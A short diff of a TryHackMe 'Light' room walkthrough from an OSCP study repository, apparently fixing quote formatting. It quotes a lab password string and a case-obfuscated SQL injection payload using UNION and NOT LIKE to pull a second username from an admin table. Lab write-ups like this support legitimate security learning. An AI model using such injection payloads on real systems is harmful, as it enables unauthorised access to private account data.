bar-tech00/My-OSCP-Journey/Walkthroughs/TryHackMe/Light.md

 mamZtAuMlrsEy5bp6q17
 ```

 If there are two records in the table and I know one of them I can just create a reverse query by asking for a username that is not a username of  TryHackMeAdmin.
-To do that I will use ‘NOT LIKE’ operator.
+To do that I will use `NOT LIKE` operator.

 ```
 ' unioN Select username FROM admintable WHERE username NOT LIKE 'TryHackMeAdmin